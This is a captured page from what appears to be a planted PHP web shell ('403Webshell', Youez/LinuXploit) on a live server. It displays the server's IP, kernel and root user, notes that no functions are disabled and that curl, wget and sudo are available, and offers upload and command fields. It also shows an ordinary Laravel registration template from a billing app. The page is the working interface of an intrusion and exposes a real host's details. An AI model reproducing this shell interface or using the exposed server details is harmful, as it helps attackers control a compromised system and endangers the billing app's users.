403Webshell
Server IP : 139.59.63.204  /  Your IP : 216.73.217.62
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ubuntu-s-1vcpu-1gb-blr1-01 6.8.0-110-generic #110-Ubuntu SMP PREEMPT_DYNAMIC Thu Mar 19 15:09:20 UTC 2026 x86_64
User : root ( 0)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/billing/resources/views/auth/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/billing/resources/views/auth/register.blade.php
@extends('layouts.weblayout')
@section('content')
<div class="container col-sm-12 col-md-12 col-lg-6 mt-5 mb-5">
    <div class="card mb-2">
<div class="card card-bordered">
    <div class="card-header">
        <h3 class="card-title">{{ __('Register') }}</h3>
        
    </div>
    <div class="card-body fs-6 py-15 px-10 py-lg-15 px-lg-15 text-gray-700">
        <form method="POST" class="form"  action="{{ route('register') }}">
            @csrf

            <div class="fv-row mb-10 mb-3">
                <label for="name" class="required fw-bold fs-6 mb-2">{{ __('Name') }}</label>

                <div class="col-md-12">
                    <input id="name" type="text" class="form-control form-control-solid mb-3 mb-lg-0   @error('name') is-invalid @enderror" name="name" value="{{ old('name') }}" required autocomplete="name" autofocus>

                    @error('name')
                        <span class="invalid-feedback" role="alert">
                            <strong>{{ $message }}</strong>
                        </span>
                    @enderror
                </div>
            </div>
            <div class="fv-row mb-10 mb-3">
                <label for="name" class="required fw-bold fs-6 mb-2">{{ __('Business Type') }}</label>

                <div class="col-md-12">
                    @php $industries = Helper::businessType(); @endphp
                   <select name="industry_type" class="form-control form-control-solid mb-3 mb-lg-0   @error('industry_type') is-invalid @enderror">
                    <option value="">Select Business Type</option>
                    @forelse($industries as $ind)
                    <option value="{{$ind->id}}">{{$ind->name}}</option>
                    @empty
                    @endforelse
                   </select>

                    @error('industry_type')
                        <span class="invalid-feedback" role="alert">
                            <strong>{{ $message }}</strong>
                        </span>
                    @enderror
                </div>
            </div>
            <div class="fv-row mb-10 mb-3">
                <label for="email" class="required fw-bold fs-6 mb-2">{{ __('Email Address') }}</label>

                <div class="col-md-12">
                    <input id="email" type="email" class="form-control form-control-solid mb-3 mb-lg-0   @error('email') is-invalid @enderror" name="email" value="{{ old('email') }}" required autocomplete="email">

                    @error('email')
                        <span class="invalid-feedback" role="alert">
                            <strong>{{ $message }}</strong>
                        </span>
                    @enderror
                </div>
            </div>

            <div class="fv-row mb-10 mb-3">
                <label for="password" class="required fw-bold fs-6 mb-2">{{ __('Password') }}</label>

                <div class="col-md-12">
                    <input id="password" type="password" class="form-control form-control-solid mb-3 mb-lg-0   @error('password') is-invalid @enderror" name="password" required autocomplete="new-password">

                    @error('password')
                        <span class="invalid-feedback" role="alert">
                            <strong>{{ $message }}</strong>
                        </span>
                    @enderror
                </div>
            </div>

            <div class="fv-row mb-10 mb-3">
                <label for="password-confirm" class="required fw-bold fs-6 mb-2">{{ __('Confirm Password') }}</label>

                <div class="col-md-12">
                    <input id="password-confirm" type="password" class="form-control form-control-solid mb-3 mb-lg-0  " name="password_confirmation" required autocomplete="new-password">
                </div>
            </div>

            <div class="row mb-0 mb-3">
                <div class="col-md-6">
                    <button type="submit" class="btn btn-primary">
                        {{ __('Register') }}
                    </button>
                </div>
                <div class="col-md-6 ">
                    @if (Route::has('login'))
                    <p>Already Registered <a class="btn btn-link px-2" href="{{ route('login') }}">
                        {{ __('Login') }}
                    </a> here</p>
                @endif
                </div>
            </div>
        </form>
    </div>
    
</div>
</div>
</div>
@endsection

Youez - 2016 - github.com/yon3zu
LinuXploit